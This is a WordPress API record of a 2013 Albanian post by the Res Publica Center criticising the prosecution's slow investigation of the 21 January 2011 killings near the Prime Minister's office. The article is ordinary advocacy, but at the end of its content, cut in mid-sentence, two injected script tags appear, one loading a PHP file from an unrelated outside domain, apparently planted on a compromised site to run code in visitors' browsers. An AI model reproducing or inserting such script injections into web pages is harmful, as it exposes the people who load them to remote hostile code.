{"id":541,"date":"2013-02-15T16:19:11","date_gmt":"2013-02-15T14:19:11","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=541"},"modified":"2013-10-02T16:21:39","modified_gmt":"2013-10-02T14:21:39","slug":"21-janari-vetem-sapo-ka-filluar","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=541","title":{"rendered":"21 Janari vet\u00ebm sapo ka filluar"},"content":{"rendered":"<p>Qendra Res Publica q\u00eb mbron interesat e dy nga t\u00eb vrar\u00ebt e 21 janarit, para disa dit\u00ebsh u vu n\u00eb dijeni t\u00eb faktit se Prokuroria ka nd\u00ebr mend t\u00eb heq\u00eb dor\u00eb paraprakisht nga kryerja e eksperimentit hetimor n\u00eb af\u00ebrsi t\u00eb Kryeministris\u00eb, p\u00ebr arsye t\u00eb munges\u00ebs s\u00eb bashk\u00ebpunimi midis institucioneve. Grupi hetimor i caktuar me zbardhjen e ngjarjes, thot\u00eb se par\u00ebsore \u00ebsht\u00eb kryerja e ekspertimeve t\u00eb pamjeve filmike n\u00eb SHBA, \u00e7ka mund t\u00eb sjell\u00eb gjetjen e provave t\u00eb reja, q\u00eb tregojn\u00eb se cili prej gardist\u00ebve ka q\u00eblluar drejt turm\u00ebs gjat\u00eb demonstrat\u00ebs. Prokuroria e Tiran\u00ebs, megjith\u00ebse kan\u00eb kaluar shtat\u00eb muaj nga ngjarja pran\u00eb Kryeministris\u00eb, ende nuk ka kryer nj\u00eb s\u00ebr\u00eb procedurash hetimore, kjo e ndikuar edhe nga mungesa e bashk\u00ebpunimit t\u00eb duhur nga disa prej institucioneve q\u00eb jan\u00eb n\u00eb var\u00ebsi t\u00eb ekzekutivit. Jan\u00eb vonuar s\u00eb tep\u00ebrmi ekspertimet e predhave dhe arm\u00ebve. Vendngjarja n\u00eb oborrin e Kryeministris\u00eb \u00ebsht\u00eb k\u00ebqyrur vet\u00ebm menj\u00ebher\u00eb pas ngjarjes, nd\u00ebrsa m\u00eb pas grupi hetimor nuk ka marr\u00eb asnj\u00eb prov\u00eb. Madje edhe serveri i kamerave t\u00eb siguris\u00eb n\u00eb Kryeministri nuk i \u00ebsht\u00eb dh\u00ebn\u00eb menj\u00ebher\u00eb k\u00ebtij grupi hetimor. Vet\u00ebm pas negocimit t\u00eb pal\u00ebs amerikane q\u00eb po ndihmon n\u00eb zbardhjen e \u00e7\u00ebshtjes i \u00ebsht\u00eb v\u00ebn\u00eb n\u00eb dispozicion serveri, ku grupin hetimor konstatoi se mungonin pik\u00ebrisht pamjet e dat\u00ebs 21 janar 2011. I gjendur p\u00ebrball\u00eb k\u00ebtyre v\u00ebshtir\u00ebsive, grupi hetimor ka preferuar q\u00eb m\u00eb par\u00eb t\u00eb marr\u00eb n\u00eb dor\u00eb t\u00eb gjitha provat e 21 janarit dhe m\u00eb pas t\u00eb vendos\u00eb n\u00ebse do ta kryej\u00eb k\u00ebt\u00eb eksperiment ose jo. Sipas organit t\u00eb prokuroris\u00eb, gardist\u00ebt q\u00eb formonin t\u00eb ashtuquajturin \u201cgrupi i zjarrit\u201d kan\u00eb qendruar brenda rrethimit t\u00eb Kryeministris\u00eb. E gjith\u00eb skena \u00ebsht\u00eb filmuar nga ekspert\u00ebt e FBI-s\u00eb, t\u00eb cil\u00ebt kan\u00eb hedhur n\u00eb programet kompjuterike t\u00eb dh\u00ebnat p\u00ebr t\u00eb rind\u00ebrtuar sken\u00ebn e vrasjeve t\u00eb 21 janarit, k\u00ebndin nga kan\u00eb ardhur plumbat e deri te detajet e tjera. Shtat\u00eb t\u00eb plagosurit kan\u00eb treguar vendin ku jan\u00eb plagosur. Pas piketimit t\u00eb vendeve, ekspert\u00ebt e FBI-s\u00eb i kan\u00eb hedhur t\u00eb dh\u00ebnat n\u00eb kompjuter p\u00ebr t\u00eb kryer m\u00eb pas eksperimentin virtualisht.<\/p>\n<p>Mungesa e bashk\u00ebpunimit midis institucioneve do t\u00eb \u00e7oj\u00eb tek veshtir\u00ebsimi i zbardhjes s\u00eb ngjarjes s\u00eb 21 janarit. N\u00eb k\u00ebto kushte do jet\u00eb e v\u00ebshtir\u00eb q\u00eb t\u00eb kemi nj\u00eb rezultat t\u00eb pranuesh\u00ebm n\u00eb gjetjen e fajtorit dhe Shqip\u00ebria do t\u00eb ket\u00eb shkelur n\u00eb m\u00ebnyr\u00eb evidente nenin 2 t\u00eb Konvent\u00ebs Europiane t\u00eb t\u00eb Drejtave t\u00eb Njeriut, e cila k\u00ebrkon hetim t\u00eb plot\u00eb dhe ezaurues p\u00ebr \u00e7\u00ebshtje t\u00eb k\u00ebsaj natyre. Bashk\u00ebpunimi i munguar midis institucioneve do t\u00eb sjell\u00eb si pasoj\u00eb munges\u00ebn e elementeve thelb\u00ebsor\u00eb p\u00ebr realizimin e nj\u00eb procesi t\u00eb plot\u00eb hetimor, si\u00e7 jan\u00eb provat filmike t\u00eb Kryeministris\u00eb dhe eksperimenti i cili do t\u00eb provonte n\u00eb m\u00ebnyr\u00eb shkencore at\u00eb q\u00eb perceptohet dhe nga pamjet. N\u00eb nj\u00eb situat\u00eb ku nuk realizohet zbardhja e ngjarjes dhe d\u00ebnimi i fajtor\u00ebve, duke passjell\u00eb mosp\u00ebrmir\u00ebsimin e gjendjes s\u00eb viktimave, kemi shkelje t\u00eb nenit 2 t\u00ebKonvent\u00ebs<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Qendra Res Publica q\u00eb mbron interesat e dy nga t\u00eb vrar\u00ebt e 21 janarit, para disa dit\u00ebsh u vu n\u00eb [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":542,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/541"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=541"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/541\/revisions"}],"predecessor-version":[{"id":543,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/541\/revisions\/543"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/542"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=541"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=541"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=541"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}